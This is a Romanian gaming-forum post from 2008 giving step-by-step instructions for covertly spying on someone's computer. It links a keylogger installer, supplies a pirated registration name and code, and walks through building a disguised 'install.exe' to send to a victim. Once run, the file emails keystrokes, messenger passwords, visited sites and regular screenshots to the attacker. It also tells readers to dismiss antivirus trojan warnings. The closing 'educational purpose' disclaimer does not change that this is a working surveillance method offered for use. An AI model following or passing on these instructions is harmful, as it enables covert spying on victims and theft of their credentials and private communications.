Idle.CsZone.Ro
Doriti să reactionati la acest mesaj? Creati un cont în câteva clickuri sau conectati-vă pentru a continua.

Idle.CsZone.Ro

Forum configurat de kQu3 & L1f3

 
AcasaPortalUltimele imaginiCăutareÎnregistrareConectare

 

 Cum te joci cu pc cuiva by k1nder

In jos 
AutorMesaj
kQu3




Mesaje : 85
Data de înscriere : 16/06/2008

Cum te joci cu pc cuiva by k1nder Empty
MesajSubiect: Cum te joci cu pc cuiva by k1nder   Cum te joci cu pc cuiva by k1nder Icon_minitimeJoi Noi 06, 2008 1:13 am

Io zic k metoda mea de aflat parole la mes shi alte chestii de la cineva din pc e cea mai buna. Mai intai va trebuie un key logger, iar cu acest tool putetzi afla parola de mess, ce siteuri acceseaza persoana respectiva, ce scrie pe mess, absolut tot ce scrie in pc shi chiar shi SCREENSHOTURI de la acea persoana din pc! Nu e vrajeala, am incerkt shi yo shi merge 100%.Acel key logger il putetzi lua de aici http://www.shareup.com/downloading-2917.html sau in caz de nu merge de aici http://rapidshare.com/files/41438489/setup_akl.exe - pe ambele linkuri o sa zica k are trojan dar nu are nik, nu va lasatzi pacalitzi deoarece acest progam este recunoscut k o aplicatzie de facut "DEPLOYMENT" pe care sa-l trimitzi la cineva shi knd persoana respectiva da dublu-clik pe acel deployment , u vei avea acces la toate informatziile din pc-ul ei(cele de mai sus).
INSTRUCTZIUNIupa ce instalatzi keyloggerul o sa apara o iconitza jos la in dreapta, datzi clik dreapta pe ea shi apasatzi la enter registration code k sa vezti full version name:crsky
code:GQSPCMCASGOVSQK
------creearea acelui deployment--------
Datzi click dreapta iar pe acea iconitza shi selectatzi "remote installation" apoi next,apoi la "additional components" selectatzi tot shi datzi next,apoi o sa apara mai multe casutze--->bifatzi-le pe toate shi next,iar next,iar next,iar next, activatzi prima casutza shi setatzi un interval de timp la care sa primitzi un log cu informatziile ce provin de la victima(de preferabil 11 minute) la delivery method lasatzi email la include activatzi tot la log format lasatzi doar HTML shi next, la "send to" punetzi-va dresa voastra de mail(ex. E-mail) la send from o adresa oricare la intamplare E-mail) la smtp host apasatzi FIND shi next,bifatzi tot shi next, selectatzi un interval de timp la care sa se faca un screenshot din pc victimei(de preferabil 5 minute) shi next, selectatzi locatzia(oriunde) shi next (de prferabil lasatzi numele fishierului "install.exe" nu modificatzi nici nume nici path nimik) shi next apoi FINISH....tot ce trebuie sa facetzi, e sa datzi acel "install" la cine vretzi voi, iar knd persoana respectiva va da dubluclik pe acel fishier voi o sa-i spionatzi tot ce are in pc cum am mai spus shi sus la inceputul mesajului shi vei primi nijte loguri prin intermediul emailului pe adresa voastra shi have fun shi hack-uire placuta .... iar yo nu-s responsabil pentru nimik din astea , totul e cu scop educativ
Sus In jos
 
Cum te joci cu pc cuiva by k1nder
Sus 
Pagina 1 din 1
 Subiecte similare
-
» Cum sa reformatezi pc cuiva
» k1Nder vs .....
» reclamatie pt jumy
» rugamintea mea by k1NdEr
» turboflod by k1NdEr

Permisiunile acestui forum:Nu puteti raspunde la subiectele acestui forum
Idle.CsZone.Ro :: Counter-Strike :: Hacking Request-
Mergi direct la: